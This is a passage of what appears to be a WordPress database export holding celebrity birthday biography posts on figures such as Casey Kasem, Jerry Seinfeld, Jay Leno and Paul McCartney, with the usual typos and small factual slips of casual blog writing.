Beginning</h2>\r\nKemal Amen “Casey” Kasem was born to Lebanese Druze immigrant parents working as grocers in Detroit, Michigan on April 27, 1932. He first began dreaming of a career in radio after listening to the 1940s show “Make Believe Ballroom.”\r\n\r\nActing out on his dreams in high school, Casey covered sports on Northwestern High School’s radio station. During college at Wayne State University, he did voice work for various radio shows to include <em>The Lone Ranger. </em>Casey’s radio career didn’t even stop when we was drafted into the US Army in 1952, he worked as the DJ on Armed Forces Radio, Korea Network. It’s safe to say Casey Kasem had found his niche in life.\r\n\r\nAfter the war, Casey moved back to Flint, Michigan to begin his broadcasting career. He bounced around from Detroit, New York, and Cleveland doing various radio shows before settling down in California. In California he bounced a bit between Oakland, San Francisco, and Los Angeles earning the reputation of a host who offered biographical tidbits of musicians in addition to discussing the music. By 1963 Casey ruled the R&B music radio waves in East L.A. working on <a href=\"https://en.wikipedia.org/wiki/KRLA\" target=\"_blank\">KRLA</a>.\r\n<h2>Career Accomplishments</h2>\r\n<h3>Most Known For</h3>\r\nAsk anyone about Casey Kasem and they will most likely recall his smooth voice and his popular show, <em>American Top 40</em>. Recognizing his voice as an asset, Casey worked often as a voice actor, namely as the voice of <a href=\"http://www.behindthevoiceactors.com/Casey-Kasem/\" target=\"_blank\">Shaggy</a> on <em>Scooby-Doo, Where Are You!</em>\r\n\r\nThe <em>American Top 40</em> radio show (1970-1988), <em>Casey</em><em>’</em><em>s Top 40</em> (1988-1998) and <em>American Top 40</em>, the second run (1998-2009) are what Casey Kasem is best known for: a weekly countdown of the top 40 songs on the Billboard Hot 100. With each song Casey would incorporate his signature biographical tidbits on the artists, ask trivia before commercial breaks, and read fans’ long distance dedications. He signed off every show with “Keep your feet on the ground and keep reaching for the stars.” Through the years the main concept of the show remained the same even with name changes due to contractual issues.\r\n\r\nIn 2004 Casey retired from the show, passing on the reins on <em>American Top 40 </em>to Ryan Seacrest. He took up various voice over jobs and appeared on his daughter’s podcast before completely retiring in 2009, although he did some more voice acting as Shaggy in <em>Scooby Doo! Mystery Incorporated</em> from 2010-2013.\r\n<h2>Personal Life</h2>\r\nCasey Kasem is a vegan and a <a href=\"http://www.washingtonpost.com/blogs/style-blog/wp/2014/06/15/casey-kasems-life-outside-of-radio-voice-over-acting-political-activism/\" target=\"_blank\">political activist</a> especially in Lebanese and Arab issues. These inclinations caused Kasem to leave shows that contradicted his beliefs like his role as Shaggy in 1997 due to a Burger King Commercial (he took the role back in 2009 when Shaggy became a vegetarian) and voice role on <em>Transformers</em> when the story line painted Arabs in a poor fashion.\r\n\r\nHe married twice- Linda Myers form 1972-1979 and Jean Thompson from 1980 until his death in 2014. He has four children: Mike, Julie, and Kerri Kasem (with Myers), and Liberty Jean Kasem (with Thompson).\r\n<h2>Where Are They Now</h2>\r\nThe last years of <a href=\"http://www.nytimes.com/2014/06/16/business/media/casey-kasem-wholesome-voice-of-pop-radio-dies-at-82.html?_r=0\" target=\"_blank\">Casey Kasem</a>’s life were difficult. He was diagnosed with Parkinson’s disease in 2007, then with Lewy body dementia. He could not speak during his last few months. He died in Gig Harbor, Washington on June 15, 2014 at the age of 82.\r\n\r\nImage credit: istockphoto.com\r\n\r\n ','Casey Kasem','','publish','open','open','','casey-kasem-renowned-radio-host','','','2015-10-14 14:33:38','2015-10-14 14:33:38','',0,'http://birthdaypedia.wpengine.com/?p=48',0,'post','',0),(49,2,'2015-04-29 09:53:21','2015-04-29 09:53:21','<h2>In the Beginning</h2>\r\n<a href=\"http://www.imdb.com/name/nm0000632/\" target=\"_blank\">Jerome Allen “Jerry” Seinfeld</a>, known for his observational humor, was born on April 29, 1954 in Brooklyn, New York to two Jewish immigrants. Seinfeld grew up in Massapequa, New York and spent time during his adolescence volunteering in Israel. He attended State University of New York at Oswego before transferring to Queens College, City University of New York and graduating with a degree in communications and theater.\r\n\r\nIt was during his time in college when Seinfeld developed an interest in comedy. He preformed in college productions and then went on to try out at various open microphone nights around New York City. He managed to land an appearance in a Rodney Dangerfield HBO special, a small role on the sitcom <em>Benson</em>, then made a successful appearance in the <em>Tonight Show Starring Johnny Carson</em>, breaking him into recurring appearances on the late night show circuit.\r\n<h2>Career Accomplishments</h2>\r\n<h3>Most Known For</h3>\r\nJerry Seinfeld is best known for his sitcom <em><a href=\"http://www.sonypictures.com/tv/seinfeld/\" target=\"_blank\">Seinfeld</a></em> (1989-1998) which he co-created and co-wrote with Larry David. <em>Seinfeld, </em>the sitcom, is loosely based on the comedian’s real life and persona, often called a “show about nothing.”\r\n\r\nThe show also featured Julia Louis-Dreyfus, Michael Richards, and Jason Alexander, although Seinfeld is the only actor to have appeared in every episode of the show’s running. From 2004-2007 the cast and crew reunited again to work on commentary for the show’s DVD releases.\r\n\r\nAfter <em>Seinfeld</em> ended, Seinfeld continued going on comedy tours, making commercials for companies like American Express, and writing books- mostly about his comedy routines.\r\n<h2>Current Personal Life</h2>\r\nSeinfeld met Jessica Skla, a public relations executive for Tommy Hilfiger in August 1998. Skla, a newly wed, had been in couples’ therapy with her then husband prior to meeting Seinfeld. She divorced him and married Seinfeld on Christmas Day, 1999. After the wedding the couple bought Billy Joel’s <a href=\"http://hookedonhouses.net/2014/05/22/jerry-jessica-seinfelds-house-in-the-hamptons/\" target=\"_blank\">Amaganset</a>, Long Island home. They have three children: daughter Sascha, and sons Julian and Shepherd.\r\n\r\nIn most recent years, <a href=\"http://comediansincarsgettingcoffee.com/\" target=\"_blank\">Jerry Seinfeld</a> kept busy with a web series, <em>Comedians in Cars Getting Coffee.</em> The premise was Seinfeld picking up a different comedian each show, taking him out for coffee and just chatting. He was criticized for not featuring enough women or minority comedians, to which he replied, “Who cares?…You’re funny, I’m interested. You’re not funny, I’m not.”\r\n\r\nDuring a radio interview with WFAN’s “Boomer and Carton” in January 2014 Seinfeld revealed a <em>Seinfeld</em> project was underway. Fans were ecstatic of a potential reunion, especially when a photo surfaced with Seinfeld and Alexander walking into the sitcom’s famous diner, “Tom’s Restaurant.\"\r\n<h2>Where Are They Now</h2>\r\nSeinfeld splits his time between New York and California, making late night show appearances, commentating on the New York Mets on local radio stations, and participating in charity and political movements, namely presidential campaigns. Thanks to his sitcom, stand-up, and syndication deals, Seinfeld is regarded as the wealthiest actor alive with a net worth of $820 million, according to Wealth-X Hollywood in 2014.\r\n\r\n[<a href=\"https://www.flickr.com/photos/flapa/3995589800/sizes/o/\" target=\"_blank\">Image</a>]\r\n\r\n ','Jerry Seinfeld','','publish','open','open','','jerry-seinfeld-greatest-stand-up-comedian','','','2015-10-14 14:34:29','2015-10-14 14:34:29','',0,'http://birthdaypedia.wpengine.com/?p=49',0,'post','',0),(50,2,'2015-04-28 10:04:26','2015-04-28 10:04:26','<h2>In the Beginning</h2>\r\nBorn April 28, 1950 in New Rochelle, New York to a Scottish immigrant mother and a second generation New Yorker, Jay Leno lived an ordinary childhood in the suburbs of Andover, Massachusetts. He attended Emerson College, earning a Bachelor’s degree in speech therapy.\r\n\r\nLeno found comedy suited him thus strived to make a career of it. He spent the 1970s and early 1980s doing stand-up, began his own comedy club (1973), and acted in various movies and shows. He was a regular substitute host for Johnny Carson on <em>The Tonight Show</em>, eventually replacing him in 1992- a switch that created much controversy as some people thought David Letterman would take over.\r\n<h2>Career Accomplishments</h2>\r\n<h3>Most Known For</h3>\r\nFans of Jay Leno easily recognize the comedian thanks to his prominent jaw, described as mandibular prognathism. In his autobiography <em><a href=\"http://www.people.com/people/archive/article/0,,20142486,00.html\" target=\"_blank\">Leading with My Chin</a></em>, Leno describes the surgery to reduce his chin size, but acknowledges his reluctance to spending the healing time with his jaws wired shut.\r\n\r\nOf course the funny man is best known for NBC’s <em>The Tonight Show With Jay Leno</em> which ran from 1992-2009. In the entire run time, only two episodes were cancelled, April 23 and 24th, due to Leno checking himself into a hospital for what he referred to as exhaustion.\r\n\r\nWhen Leno’s contract for the show ended in September 2009, Conan O’Brien took over while Leno’s new project became NBC’s <em>The Jay Leno Show.</em> He took some of his popular segments to the new show.\r\n\r\nIn January 2010, due to poor viewing audiences, NBC decided to shorten both O’Brien and Leno’s shows and move the <em>Tonight Show</em> to 12:05 am, out of primetime. O’Brien didn’t agree with the time change, so he left the network and Leno returned to <em>The Tonight Show</em>, but not without plenty of controversy and criticism. Some O’Brien supporters claimed Leno was acting ‘classless’ and ‘bullying’ in addition to a shift towards disappointing monologues, while Leno supporters stood by and defended the man. Jay Leno left the show for good on February 6, 2014 with <a href=\"http://www.nydailynews.com/entertainment/tv/jay-leno-teases-jimmy-fallon-tonight-show-return-article-1.2003790\" target=\"_blank\">Jimmy Fallon</a> as his successor.\r\n\r\nThroughout this time Leno continued doing standup, especially for charity and USO events. He has been the guest for other late night shows, and hosted a special, soon to be regular show this year, on CNBC, <a href=\"http://www.nbc.com/jay-lenos-garage\" target=\"_blank\"><em>Jay Leno</em><em>’</em></a><em><a href=\"http://www.nbc.com/jay-lenos-garage\" target=\"_blank\">s Garage</a>.</em>\r\n<h2>Life After The Tonight Show</h2>\r\n<a href=\"http://www.bornrich.com/jay-leno.html\" target=\"_blank\">Jay Leno</a> has been married to Mavis Leno since 1980, they have no children. They spend much of their free time devoting time and money to charities like the Feminist Majority Campaign to stop gender apartheid and inform the public on Taliban treatment of women, and the Salem State College. Since 1985 Leno has been the Grand Marshal for the Love Ride, a motorcycle charity who has raised $14 million since its start in 1984 for various charities to include Autism Speaks and September 11th recovery.\r\n\r\nLeno also enjoys spending time restoring classic cars- 169 automobiles and 117 motorcycles. He writes about his hobby in a regular <em>Popular Mechanics</em> column and occasionally in <em>The Sunday Times</em>.\r\n\r\n[<a href=\"https://www.flickr.com/photos/nalinicprasanna/576803707/sizes/l\" target=\"_blank\">Image</a>]\r\n\r\n ','Jay Leno','','publish','open','open','','jay-leno-acclaimed-tv-host','','','2015-10-14 14:34:01','2015-10-14 14:34:01','',0,'http://birthdaypedia.wpengine.com/?p=50',0,'post','',0),(51,2,'2015-04-30 09:14:43','2015-04-30 09:14:43','<h2>In the Beginning</h2>\r\n<a href=\"https://en.wikipedia.org/wiki/Dianna_Agron\" target=\"_blank\">Dianna Elise Argon</a> was born on April 30, 1986 in Savannah, Georgia. Her father, being a general manager for Hyatt hotels, moved the family often during Argon’s childhood. She recalls living in various hotels in San Antonio, Texas and San Francisco, California.\r\n\r\nArgon was raised Jewish, taking part in Hebrew school and having a bat mitzvah. She was very involved in dance and theater during her adolescence; acting in school plays and helping with costume and set designs at her high school, Burlingame High School. Her acting dreams realized, Argon pursued a career in television, landing roles on <em>CSI: NY, Heroes,</em> and <em>Veronica Mars.</em> Around 2008 she hit a slump in her career when the only roles being offered to her were horror films that included nudity, she turned them all down.\r\n<h2>Career Accomplishments</h2>\r\n<h3>Most Known For</h3>\r\nIn 2009, after her mini-slump, Argon received the role of <a href=\"http://glee.wikia.com/wiki/Quinn_Fabray\" target=\"_blank\">Quinn Fabray</a> in the Fox comedy-drama <em>Glee. </em>The character is the head cheerleader at the high school, and portrayed as a mean, antagonistic counterpart to Rachel Berry, played by Lea Michele.\r\n\r\nAs the show continued, Argon’s character appeared less and less, acting in only three episodes during the fourth season, and two episodes during the fifth season. During <em>Glee</em><em>’</em><em>s</em> final season, she appeared in three episodes.\r\n\r\nArgon has been praised for her acting and singing abilities. She received positive praise from her musical acts on <em>Glee,</em> earning a few number one places on the <a href=\"http://www.mtv.co.uk/sam-smith/news/watch-sam-smiths-im-not-the-only-one-video-starring-dianna-agron\" target=\"_blank\">UK Singles Chart</a>.\r\n\r\nDuring her drawdown from <em>Glee</em>, Argon took a few roles in mediocre films, although her most recent films<em> Zipper, Tumbledown,</em> and <em>Bare</em> have received rave reviews at The Sundance and Tribeca Film festivals and are expected to play in theaters in 2015.\r\n\r\nMost recently she took to the stage to perform in a play titled <em>McQueen</em>, a fantasy-based play honoring the late Alexander McQueen for the fifth anniversary of his death. The play ran May 12- June 6, 2015 at London’s St. James Theatre.\r\n<h2>Current Personal Life</h2>\r\nArgon continues to keep in touch with her <em>Glee</em> co-stars and is active in the PETA and gay rights communities. She partakes in various charities and fund raisers to include The Trevor Project, Somaly Mam Foundation, Camp Wonder, and ASmallWorld.\r\n\r\nShe began a website, You, Me and Charlie in late 2011, and continues to post stories and pictures in an effort to inspire artists everywhere. <em>Vanity Fair</em> complemented the site’s purpose and layout.\r\n\r\nArgon continues to earn rankings in various lists such as: number 8th on 2011 <a href=\"http://AfterEllen.com\">AfterEllen.com</a> Hot 100 List; #3 on <em>Shalom Life</em><em>’</em>s list of the “The 50 Most Talented, Intelligent, Funny, and Gorgeous Jewish Women in the World; and #47 in <em>Men</em><em>’</em><em>s Health</em>’s Hottest Women of 2014.\r\n<h2>Where Are They Now</h2>\r\nArgon stated she’s like to continue focusing on her acting career, although a musical album has crossed her mind. She’s begun dabbling in directing and photography, stating she’s like to continue directing, especially after her unreleased film <em><a href=\"http://www.imdb.com/title/tt1374883/\" target=\"_blank\">A Fuchsia Elephant</a>.</em>\r\n\r\n[<a href=\"https://www.flickr.com/photos/40926212@N05/13167096363/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Dianna Argon','','publish','open','open','','dianna-argon-actress','','','2015-10-14 14:34:48','2015-10-14 14:34:48','',0,'http://birthdaypedia.wpengine.com/?p=51',0,'post','',0),(52,2,'2015-04-22 09:53:44','2015-04-22 09:53:44','When thinking about actors in the spotlight, one of the top names is almost always <a href=\"http://www.jack-nicholson.info/news/\" target=\"_blank\">Jack Nicholson</a>. With many talents from writing and acting, Jack Nicholson has had made many popular films and worked with many big name actors. With a passion for acting, art, and writing, he has become one of the most notable individuals on the red carpet today.\r\n<h2>In the Beginning</h2>\r\nBorn in <a href=\"http://www.neptunecitynj.com/\" target=\"_blank\">Neptune City, New Jersey</a>, Jack Nicholson (John Joseph Nicholson) was the son of a showgirl and her husband Donald Furcillio, an American showman. Born on April 22, 1937 Jack Nicholson was raised by his grandparents, who he thought to believe were his biological parents, due to the fact that June Nilson, Jack’s mother, was only eighteen years old at the time and wanted to continue her career. In high school he was commonly considred the “class clown,” where he graduated in Manasquan High School in 1954.\r\n<h2>Career Accomplishments</h2>\r\nEarly in his career, Jack Nicholson worked as a gofer for the MGM cartoon studio, where he was offered a position as an animation artist. He declined this offer to achieve his goal of becoming an actor. His first film was <a href=\"http://www.imdb.com/title/tt0051500/\" target=\"_blank\">The Cry Baby Killer</a> (1958) and later appeared in The Andy Griffith Show. With his career seemingly going nowhere, Jack began writing for film. He wrote The Trip in 1967 and later Head, starring The Monkees.\r\n<h2>Most Known For</h2>\r\nToday Jack Nicholson is most known for his debut in Easy Rider, where he played a hard drinking lawyer, receiving his first Oscar nomination. Later in 1870 he received a Best Actor nomination for his role in Five Easy Pieces and was the first choice for the role of Father Damien Karras in The Exorcist the same year. He finally achieved his first Best Actor Award in 1975 with his role in One Flew Over the Cuckoo’s Nest. He is most recognized for his role in Stephen King’s 1980 movie The Shining. More recently, he has had notable roles in A Few Good Men (1992), As Good As It Gets (1997), The Departed (2006), and many more.\r\n<h2>Current Personal Life</h2>\r\nJack Nicholson was only married once, to Sandra Knight with a marriage in 1962 and ending in 1968. Since then he has had a brief relationship with Anjelica Huston and Winnie Hollman, and more recently Rebecca Broussard (1989-1994). More recently, Jack Nicholson seems to have remained single or keeping his personal happenings private enough for no one to confirm a relationship.\r\n<h2>Where Are They Now</h2>\r\nCurrently, Jack Nicholson remains one of the most notable faces on the red carpet and in Hollywood. This past February, 2015, he made an appearance on the special 40<sup>th</sup> anniversary of Saturday Night Live (SNL) He is an avid fan of the New York Yankees and the Los Angeles Lakers and can usually be seen sitting on the sidelines, usually courtside, at most of these games. He has achieved 12 Acadamy Awards, 3 <a href=\"http://aaspeechesdb.oscars.org/link/070-1/\" target=\"_blank\">Oscar Wins</a>, and will continue to remain a figure among the celebrities.\r\n\r\n[<a href=\"https://www.flickr.com/photos/biketrip2006/3641406443/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Jack Nicholson','','publish','open','open','','jack-nicholson','','','2015-10-13 19:53:37','2015-10-13 19:53:37','',0,'http://birthdaypedia.wpengine.com/?p=52',0,'post','',0),(53,2,'2015-04-23 10:14:37','2015-04-23 10:14:37','<a href=\"https://en.wikipedia.org/wiki/History_of_professional_wrestling_in_the_United_States\" target=\"_blank\">American professional wrestling</a> has created many superstars that are well known worldwide and idolized by many children and even adults. Of those, John Cena is one of the most recognized.\r\n<h2>In the Beginning</h2>\r\nBorn in West Newbury, Massachusetts John Cena (John Felix Anthony Cena) was the second born of five children, all brothers: Dan, Matt, Steve, and Sean. As his mother’s father, Tony Lupien, was a professional baseball player starting on the Boston Red Sox and ending his career on the Chicago White Socks, his athleticism may have been passed down through the genes. He attended Cushing Academy, a coeducational college preparatory high school in Ashburnham, Massachusetts, and later graduated from Springfield College in Springfield, Massachusetts. While at Springfield College, John Cena played as the NCAA Division III All-American Center, where he wore the number 54 on his uniform, which is why this number can still be found on his WWE attire. From here he pursued a career in bodybuilding, as he worked as a limousine driver.\r\n<h2>Career Accomplishments</h2>\r\nJohn Cena’s career started in 1999 as he began training with a goal of becoming a professional wrestler. He was mainly at Ultimate Pro Wrestling in California with Rick Bassman. Eventually he was granted the opportunity to enter the ring, where he became known as “The Prototype.” The Discovery Channel featured him in its Inside Pro Wrestling School documentary, where he shows the challenges and insights into his training and what it takes to become a Professional Wrestler. John Cena later make is WWF entrance in the SmackDown where he lost against Mikey Richardson.\r\n\r\nHowever, he was given another entrance into WWF when he defeated Aaron Aguilera. For most of 2002, John Cena seemed to be consistently defeated by opponents, however, he was still a fan favorite. By 2003, Cena had started defeating his opponents and was after the WWE Championship. It wasn’t until 2004 that John Cena won the United States World Championship at <a href=\"http://prowrestling.wikia.com/wiki/WrestleMania_XX\" target=\"_blank\">WrestleManiaXX</a>. He earned a spot in the WrestleMania 21 in 2005 and won his first world championship the same year.\r\n<h2>Most Known For</h2>\r\nJohn Cena is known for many things, both good and bad. He is commonly noted as a villain, for when he attacked Billy Kidman after their loss in the <a href=\"http://www.wwe.com/superstars/johncena\" target=\"_blank\">WWE Tag Team Champions of SmackDown</a>. Then later he was negatively known for his loss of his belt and title in June 2008, after he accidently knocked down Big Show, another professional wrestler, with the charge of “attacking an official.” Yet, with the bad comes the good. He is know recognized for his association with the Raw brand and became the World Champion in 2008 through 2010. Along with his professional wrestling fame, John Cena can also be found in numerous movies, such as The Marine, 12 Rounds, and in TV appearances on Jimmy Kimmel Love and other shows.\r\n<h2>Current Personal Life</h2>\r\nJohn Cena propsed to his girlfriend Elizabeth Huberdeau in 2009 and was married in July of 2009. Less than three years later, John Cena and his wife filed for divorce in May of 2012, which was finalized the same year. Currently, Cena is apparently dating Nikki Bella, a WWE Diva, however no engagement plans or wedding information has been reported.\r\n<h2>Where Are They Now</h2>\r\nCurrently, John Cena has been active with the <a href=\"http://worldwish.org/en/wishes?gclid=CjwKEAjw_MisBRCTuNPfoMqU4ngSJACrJv1VfTYdh9o_ZC_Xp7sXqcpC36hM2fhAqrKpcaFEDUZ-fBoCCvLw_wcB\" target=\"_blank\">Make-A-Wish Foundation</a>, where he has helped over 400 children with life-threatening sicknesses and diseases achieve their goals. He has also been a fase for Gold’s Gym, and has had associations with Gillette. He has recently been focusing on his acting career with movies such as Sisters, which is currently being filmed and Trainwreck that will be out July 17, 2015.\r\n\r\nImage credit: istockphoto.com\r\n\r\n ','John Cena','','publish','open','open','','john-cena','','','2015-10-14 14:32:22','2015-10-14 14:32:22','',0,'http://birthdaypedia.wpengine.com/?p=53',0,'post','',0),(54,2,'2015-04-24 10:27:48','2015-04-24 10:27:48','<a href=\"http://www.famousbirthdays.com/people/kelly-clarkson.html\" target=\"_blank\">Kelly Clarkson</a> is a famous American musician, songwriter, actress, and artist. Most commonly recognized for her winning the first season of American Idol, she has since claimed her stance on the red carpet and continues to create music and embrace her music career.\r\n<h2>In the Beginning</h2>\r\nBorn to Jeanne Anne, a 1<sup>st</sup> grade elementary school teacher, and Steven Michael Clarkson, an engineer, Kelly Clarkson was born in Ft. Worth Texas. She has two older siblings, her brother Jason and sister Alyssa. Kelly Clarkson’s parents divorced when she was five years old, where Kelly also has two half siblings, from her father’s second marriage. In interviews she has noted her initial goal of becoming a marine biologist, however she changed her mind soon after seeing the movie Jaws. Throughout high school, Kelly performed in her school musicals, such as Seven Brides for Seven Brothers, and more.\r\n\r\nShe also sang in her school talent shows and was eventually offered a full scholarship to The University of Texas at Austin, University of North Texas, and Berklee College of Music, among others. Instead of attending college, Kelly Clarkson declined their offers and decided to focus on her career, understanding that she could always go to college at a later time. She began recording her demos and was offered a few contracts from Jive Records and Interscope Records, which she later declined. Later, Kelly Clarkson auditioned for <a href=\"http://time.com/3854571/kelly-clarkson-american-idol-canceled/\" target=\"_blank\">American Idol</a>: The Search for a Superstar in May of 2002. This audition was the opportunity of a lifetime.\r\n<h2>Career Accomplishments</h2>\r\nKelly Clarkson won the American Idol competition in 2002 and was signed to RCA Records, 19 Recordings, and S Records, with the help of Simon Fuller. Most recognized for her A Moment Like This song, which was the son that she sang to win the competition, this was on her first single and immediately appeared on the Billboard Hot 100 chart at number 60 in September 0f 2002. This single made its way up the rankings, eventually landing at the number one spot. This went on the be the number one best selling single of 2002. Other popular albums were later released and are as follows: Thankful (2003-2004), Breakaway (2004-2006), My December (2006-2008), <a href=\"http://lyrics.wikia.com/Kelly_Clarkson:All_I_Ever_Wanted\" target=\"_blank\">All I ever Wanted</a> (2008-2010), Stronger (2011-2012), <a href=\"http://www.kellyclarkson.com/it/news/kelly%E2%80%99s-%E2%80%98greatest-hits-%E2%80%93-chapter-one%E2%80%99-available-now\" target=\"_blank\">Greatest Hits- Chapter One and Wrapped in Red</a> (2012-2014), Piece by Piece (2014-present).\r\n<h2>Most Known For</h2>\r\nThe tabloids seem to make not of Kelly Clarkson’s ever changing weight. Featured in numerous magazines, for example the Life & Style Weekly on April 3, 2015 by Allison Cacich titled “People Continue to Comment on Kelly Clarkson’s Wieght and She Continues to Not Give a Damn.” Aside from her changing weight, she is also commonly referenced for her association with ProActive, the acne medication. Yet, at the end of the day, she is always recognized as a performer and an artist first and foremost.\r\n<h2>Current Personal Life</h2>\r\nKelly Clarkson was romantically involved with her talent manager, <a href=\"http://www.etonline.com/news/128239_Kelly_Clarkson_s_Fiance_Brandon_Blackstock_5_Facts/\" target=\"_blank\">Brandon Blackstone</a> in February 2012. They were engaged December 2012 and married October of 2013. She became a step-mother to Blackstock’s children from his previous marriage and they had their first daughter, River Rose, in June 2014.\r\n<h2>Where Are They Now</h2>\r\nCurrently, Kelly Clarkson is a wife and mother and continues to write music and perform. She is going on her Piece by Piece tour in 2015 and will be performing in Pennsylvania, Massachusetts, New Jersey, New York, Connecticut, Ontario (Canada), Missouri, and various other states.\r\n\r\n[<a href=\"https://www.flickr.com/photos/chamberoffear/5761129646/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Kelly Clarkson','','publish','open','open','','kelly-clarkson','','','2015-10-14 14:32:59','2015-10-14 14:32:59','',0,'http://birthdaypedia.wpengine.com/?p=54',0,'post','',0),(55,2,'2015-06-18 09:41:48','2015-06-18 09:41:48','<h2>In The Beginning</h2>\r\nPaul McCartney was born in <a href=\"http://www.biography.com/people/groups/birth-city-liverpool-england\" target=\"_blank\">Liverpool, England</a> on June 18, 1942. He was born to Mary Patricia, a nurse and James (or Jim) McCarney, a volunteer firefighter. Paul wasn’t meant to be an only child. Only two years later he became a big brother to Michael. While the two boys were baptised Catholic, in accordance to their mother’s faith, their father was a protestant and then later an agnostic and so religion wasn’t a big focus in their family. Paul went on to attend Stockton Wood Road Primary School and then later Joseph Williams Junior School.\r\n\r\nThere he passed the 11-plus exam with flying colors and was so admitted into the Liverpool Institute. This would prove to be a monumental accomplishment because this is where he was to meet his schoolmate and future bandmate, George Harrison. When Paul was fourteen his mother passed away from embolism. This would prove to be a turning point in his life as his mother’s passing became a shared experience with John Lennon, who also lost his mother during his teens. Despite the loss of his mother, Paul continued to pursue music under the guidance of his father. Paul went on to write his first song “I Lost My Little Girl” on the Zenith.\r\n<h2>Career Accomplishments</h2>\r\nPaul McCartney is probably best known for his work in the <a href=\"http://www.thebeatles.com/\" target=\"_blank\">Beatles</a>. Before then, however, he was in a band called the Quarrymen. He played rhythm guitar along with John Lennon. By the time George Harrison joined the band, they began playing around with the name Beatals, Silver Beetles and finally the Beatles. After becoming one of the most successful bands in rock history, the Beatles separated in 1970.\r\n\r\nDespite the painful break up, Paul continued to make his own music, including his number one album titled” McCartney.” Shortly thereafter he formed the band Wings. Once they broke up, Paul went on to collaborate with Stevie Wonder, Michael Jackson, Phil Ramone and Elvis Costello just to name a few. He continues to create music with the best and brightest in the industry, including Kanye West and Rihanna.\r\n<h2>Most Known For</h2>\r\nNaturally, Paul McCartney is best known for his work in the Beatles. At the height of Beatlemania, Paul was known as the “cute Beatle.” By the time the Beatles went on to make their album, “Rubber Soul” Paul became the dominant writer for the Beatles where he hoped to expand the Beatles creativity. He also became the vocal lead for most of the album Revolver.\r\n<h2>Current Personal Life</h2>\r\nAfter twenty nine years of marriage, Paul’s wife <a href=\"https://en.wikipedia.org/wiki/Linda_McCartney\" target=\"_blank\">Linda McCartney</a> lost her battle with cancer. After four years of morning, Paul had his second chance with love when he found Heather Mills, activist and former model. In 2003, Paul and Heather brought Beatrice into the world. Three years later, Heather and Paul separated. By 2011 Paul was married for the third time to New York businesswoman <a href=\"http://pagesix.com/2014/12/23/paul-mccartney-not-too-keen-on-fans-picture-request-at-circo/\" target=\"_blank\">Nancy Shevell</a>.\r\n<h2>Where Are They Now</h2>\r\nPaul is still composing, collaborating and touring all over the world. When he isn’t playing music, he is working in film, as a writer, as a painter and as an activist. As of now Paul has absolutely no intention of retiring and after selling out massive arenas on a regular basis, why should he?\r\n\r\n[<a href=\"https://www.flickr.com/photos/58711927@N04/5385056610/sizes/l\" target=\"_blank\">Image</a>]\r\n\r\n ','Paul McCartney','','publish','open','open','','paul-mccartney','','','2015-10-14 17:57:33','2015-10-14 17:57:33','',0,'http://birthdaypedia.wpengine.com/?p=55',0,'post','',1),(56,2,'2015-06-19 10:51:22','2015-06-19 10:51:22','<h2>In The Beginning</h2>\r\nIn San Fernando, California, Paula was born to Harry Abdul, a Syrian Jewish community leader and Lorraine M. Abdul, a concert pianist. She became the younger sister to her Wendy Abdul who was seven years older than her. <a href=\"http://www.paula-abdul.net/\" target=\"_blank\">Paula</a> graduated from Van Nuys High School in 1980. While she was in high school she took dance lessons in jazz, ballet and tap while she also volunteered as a cheerleader. Even as a young girl she loved dancing. She would consistently study Gene Kelly in Singin’ in the Rain and aspired to be as accomplished as him. By the time she was fifteen she was awarded a dance scholarship and was featured in an independent musical called Junior High School. After one year of college at California State University she was enlisted to be a Los Angeles Lakers cheerleader where she quickly became the lead choreographer.\r\n<h2>Career Accomplishments</h2>\r\nThroughout her career received many awards and tons of recognition as choreographer, singer and musician. He first award she won was in 1987 when she choreographed Janet Jackson’s video “<a href=\"http://www.dailymotion.com/video/x210dr_janet-jackson-nasty_music\" target=\"_blank\">Nasty</a>.” She won best choreography at the MTV Video Music Awards and then later that year shared her award for outstanding choreography on the Tracey Ullman Show. That same year she won the People’s choice award for favorite female musical performer. In 1989 she won the MTV Video Music Award for Best Choreography, Best Editing, Best Female Video and Best Dance Video. At the American Music she won Favorite Dance Artist and Favorite Pop/Rock Female Artist as well as the People’s Choice Award for Favorite Female Musical Performer and Outstanding Choreography. In 1991 she won Best Short Form Music Video and was honored with her own star on the Hollywood Walk of Fame.\r\n<h2>Most Known For</h2>\r\nDespite her many accomplishments in choreography and singing, Paula is best known as a judge for American Idol. Between 2002 and 2009 she sat beside Simon Cowell and Randy Jackson as they weeded through thousands of pop star hopefuls. Paula was known as the sympathetic pal to the cast which turned out to be a great contrast from Simon Cowell. Simon Cowell’s tough love made Paula reconsider coming back to the show but Simon convinced her otherwise. Finally Paula decided not to return to American Idol because she had to “stand on principle.”\r\n<h2>Current Personal Life</h2>\r\nAfter being married to Emilio Estevez for two years she moved on to <a href=\"http://www.zimbio.com/dating/D8yP6BYo7sK/Paula+Abdul+married+Brad+Beckerman/Brad+Beckerman\" target=\"_blank\">Brad Beckerman</a> in 1996 until 1998. She didn’t begin dating again until 2007 when she met J.T. Torregiani and only broke up with him because of conflicting work schedules. In 2004 she was convicted of a misdemeanor hit and run and later in 2006 she was assaulted where she sustained a concussion and injuries to her spine. She currently suffers from reflex sympathetic dystrophy, a neurological disorder that causes her constant pain.\r\n<h2>Where Are They Now</h2>\r\nPaula Abdul is now working as a judge for <a href=\"http://www.fox.com/so-you-think-you-can-dance\" target=\"_blank\">So You Think You can Dance</a>. There are rumors that she could be returning to American Idol for the final season and even more rumors that she is dating John Stamos after a few shots of the two together.\r\n\r\n[<a href=\"https://www.flickr.com/photos/thirdwaythinktank/8427465686/sizes/c/\" target=\"_blank\">Image</a>]\r\n\r\n ','Paula Abdul','','publish','open','open','','paula-abdul','','','2015-10-14 18:01:49','2015-10-14 18:01:49','',0,'http://birthdaypedia.wpengine.com/?p=56',0,'post','',0),(57,2,'2015-06-22 10:00:48','2015-06-22 10:00:48','<h2>In The Beginning</h2>\r\nIn Summit, New Jersey on June 22, 1949 Mary Louise Streep was born to Mary Wilkinson Streep, a commercial artist and Harry William Streep Jr, an art editor. She became sister to brothers Dana David and Harry William the third. The whole family were active members of the Presbyterian church. She attended Bernards High school where, although she was described as a “gawky kid with glasses and frizzy hair” she participated in school recitals, theatre and as a cheerleader. By the time she performed in “Miss Julie” at Vassar College in 1969, her professor Clinton J Atkinson said, “I don’t think anyone ever taught Meryl Acting.\r\n\r\nShe really taught herself.” She received her bachelor of arts there and then moved on to get her master of fine arts from <a href=\"http://drama.yale.edu/\" 